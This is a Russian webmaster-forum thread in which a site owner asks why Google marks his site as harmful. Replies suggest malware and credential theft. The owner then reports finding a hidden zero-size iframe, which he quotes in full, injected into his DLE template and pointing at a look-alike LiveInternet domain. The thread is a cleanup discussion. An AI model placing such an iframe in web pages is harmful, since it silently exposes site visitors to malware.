"Этот сайт может нанести вред Вашему компьютеру"

r0b0t
На сайте с 12.04.2009
112
883

Доброго времени суток , столкнулся с такой проблемой , надеюсь на вашу помощь , может у кого-то была такая ситуации , самое странное в том , что сайт не содержит никаких вредоносных программ как пишет гугл ( проверял антивирусом ), хоть весь трафф с яндекса , около 3-4к в день ( с гугла менее 1 %, гугл повесил на мой сайт это предупреждение ( сайт эротического содержания сдл, но реклама еще не использовалась как и разные партнерки , кроме тизернета ) и попытка зайти блокируется красным сообщениями , возможно такое что кто-то просто отправил абузу , вроде можно отправлять на каждый сайт подобную притензию в меню сервисов гугла , пожаловаться на спам и наличие вредоносного ПО на сайте , или робот гугла обнаружил что-то , есть шанс что при следующем заходе робота все будет хорошо ( отправил сайт не пересмотрение в панели веб-мастера ) , но будет от этого толк... жалко трафф может упасть , а они заявку явно не скоро рассмотрят ... буду искренне благодарен за любые ваши советы !

Плачу % своим рефам в SAPE (http://www.sape.ru/r.PlKptRzsKl.php) | 5000р (!) за 1000 кликов (http://ladycash.ru/?ref=11936) Я смог завоевать империю, но не смог завоевать себя (c) Наполеон.
HP
На сайте с 30.05.2006
175

100% вредоносный код (был или есть) на сайте.

Проверка антивирусом ничего не говорит, например при первом заходе пытается запустить вирус, а в дальнейшем все ок.

S
На сайте с 28.10.2005
313

Сайт покажите

kuguk
На сайте с 16.01.2009
146

Посмотриет эти темы /ru/forum/376468

/ru/forum/comment/5157834

И как я с этим справился.

Первым делом почисть комп от вирусни, если сам не сможешь - посмотри в подписях у одного человека из этих тем - помощь от вирусни. Смени пароли на ftp менеджере, желательно их записать где-нибудь, а не оставлять в ftp клиенте. Ну и собственно - восстанавливай из архива - не теряй времени.

r0b0t
На сайте с 12.04.2009
112
HruPifPaf:
100% вредоносный код (был или есть) на сайте.
Проверка антивирусом ничего не говорит, например при первом заходе пытается запустить вирус, а в дальнейшем все ок.

проверял , вроде на компьютере все нормально авира премиум с последними обновлениями , хотя все равно исключать что вирус нельзя , только проверил на сайте в админке DLE , на главной странице , через панель шаблон , нашел скрытый ифрейм , незаметно прописаный кем-то , может хостера поломали (если у вас хостинг zevshost.net , то советую всем проверить файлы на вирусы), как фейк ливинтернет статы сделан

<iframe src="http://livelnternet.net/s/in.cgi?8" width="0" height="0" style="display:none"></iframe>

убрал , вроде через панель на пересмотрение падал второй раз , надеюсь уберут блокировки эту с сайта , кстати очень помог один сервис , без которого врятли бы нашел ифрейм , советую всем хотя бы зарегистрироваться там и внести в их базу свой сайт , очень полезная вещь , мне очень помогла http://www.siteguard.ru/

semenov:
Сайт покажите

2 semenov , скинул вам в личку , если интересно можете глянуть

kuguk:
Посмотриет эти темы /ru/forum/376468

И как я с этим справился.
Первым делом почисть комп от вирусни, если сам не сможешь - посмотри в подписях у одного человека из этих тем - помощь от вирусни. Смени пароли на ftp менеджере, желательно их записать где-нибудь, а не оставлять в ftp клиенте. Ну и собственно - восстанавливай из архива - не теряй времени.

искренне спасибо за ваш ответ , щас поменяю пароли все на фтп и си панель и биллинг, все в файловом менеджере хранились и в формах , хотя все же есть сомнения что это хостера поломали

S
На сайте с 28.10.2005
313
r0b0t:

2 semenov , скинул вам в личку

Промахнулись, нету ничего :D

r0b0t
На сайте с 12.04.2009
112
semenov:
Промахнулись, нету ничего :D

ник руками набирал ночью, видно кому-то другому с похожим ником ушло , щас вроде скопировал и скинул , должно уже придти:)

OPTIMER
На сайте с 05.01.2006
496

r0b0t, в хостинг напишите. Фиксить надо, причем быстрее.

оО Раскрутка сайтов без абон. платы, единоразово от 100.000 руб.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий